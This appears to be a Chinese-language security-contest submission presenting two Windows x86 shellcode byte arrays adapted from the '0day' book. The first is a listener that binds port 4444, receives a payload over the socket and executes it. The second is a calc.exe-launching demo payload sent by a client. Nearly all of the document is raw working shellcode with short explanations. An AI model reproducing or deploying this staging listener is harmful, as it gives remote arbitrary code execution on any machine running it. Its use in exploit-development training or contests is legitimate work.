

###########################
#
#  队伍：   Random  
#
#  提交者： RPG 
#
########################



shellcode源码参考了0day书上的源码，进行了一些修改。



测试代码分别为：  server.cpp  和 client.cpp



//#####################################################

server.cpp的功能：

1、创建socket服务，进行监听4444端口。
2、recv到shellcode后，直接跳转执行。


server.cpp主要用到了以下的shellcode：


//监听本地4444端口，并执行客户端发来的数据(sellcode)。。。。

"\xFC\x68\x76\x90\x97\xC7\x68\xB1\x1E\x97\x01\x68\x0C\x9F\xD3\x4B"
"\x68\x64\x10\xA7\xDD\x68\x2D\x32\x78\xDE\x68\x3D\x6A\xB4\x80\x68"
"\x32\x74\x91\x0C\x68\x67\x59\xDE\x1E\x8B\xF4\x8D\x7E\xDC\x64\x8B"
"\x1D\x30\x00\x00\x00\x8B\x4B\x0C\x8B\x49\x0C\x8B\x09\x8B\x09\x8B"
"\x69\x18\x33\xDB\xB7\x03\x2B\xE3\x66\xBB\x33\x32\x53\x68\x77\x73"
"\x32\x5F\x54\xAD\x3D\x3D\x6A\xB4\x80\x75\x06\x95\xFF\x57\xFC\x95"
"\x57\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD"
"\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08"
"\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59"
"\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95"
"\x5F\xAB\x57\x61\x3D\x76\x90\x97\xC7\x75\xA8\x5E\x54\x6A\x02\xAD"
"\xFF\xD0\x8D\x48\x30\x8B\xFC\xF3\xAB\x40\x50\x40\x50\xAD\xFF\xD0"
"\x95\xB8\x02\xFF\x11\x5C\x32\xE4\x50\x54\x55\xAD\xFF\xD0\x85\xC0"
"\x74\xF8\x95\x33\xD2\x80\xC2\x40\x52\x33\xD2\x80\xC6\x10\x52\xB6"
"\x03\x52\x33\xD2\x52\xFF\x56\xE4\x95\x33\xD2\x52\xB6\x03\x52\x55"
"\x50\xFF\x16\xFF\xE5"







//#####################################################

client.cpp的功能：


 1、连接server的4444端口，并发送一段执行计算器calc.exe程序的数据指令



client.cpp发送的shellcode为：

//通用型谈计算器shellcode
unsigned char shellcode[] = 
"\x60\x33\xc0\x50\x68\x63\x61\x6c\x63\x50\x68\x78\x65\x63\x3f\x88"
"\x44\x24\x03\x68\x57\x69\x6e\x45\x50\x68\x65\x6c\x33\x32\x68\x6b"
"\x65\x72\x6e\x64\x8b\x50\x30\x8b\x52\x0c\x83\xc2\x1c\x8b\xc2\x33"
"\xc9\x8b\x14\x0a\x3b\xc2\x74\x6d\x8b\x72\x20\x8b\xfc\xb1\x08\x8a"
"\x44\x4e\xfe\x8a\x5c\x0f\xff\xfe\xc9\x3a\xc3\x74\xf2\x80\xf9\xff"
"\x75\xdd\x8b\x42\x08\x8b\x52\x08\x03\x40\x3c\x8b\x40\x78\x03\xc2"
"\x8b\x58\x20\x13\xda\x8b\x48\x18\x8b\x3b\x03\xfa\x8d\x74\x24\x0c"
"\x51\xb1\x08\xf3\xa6\x84\xc9\x59\x74\x07\x83\xc3\x04\xe2\xe9\xeb"
"\x24\x2b\xda\x2b\x58\x20\xd1\xeb\x03\x58\x24\x03\xda\x0f\xb7\x0b"
"\xc1\xe1\x02\x03\x48\x1c\x03\xca\x8b\x09\x03\xca\x8d\x5c\x24\x18"
"\x6a\x01\x53\xff\xd1\x83\xc4\x20\x61\xc3";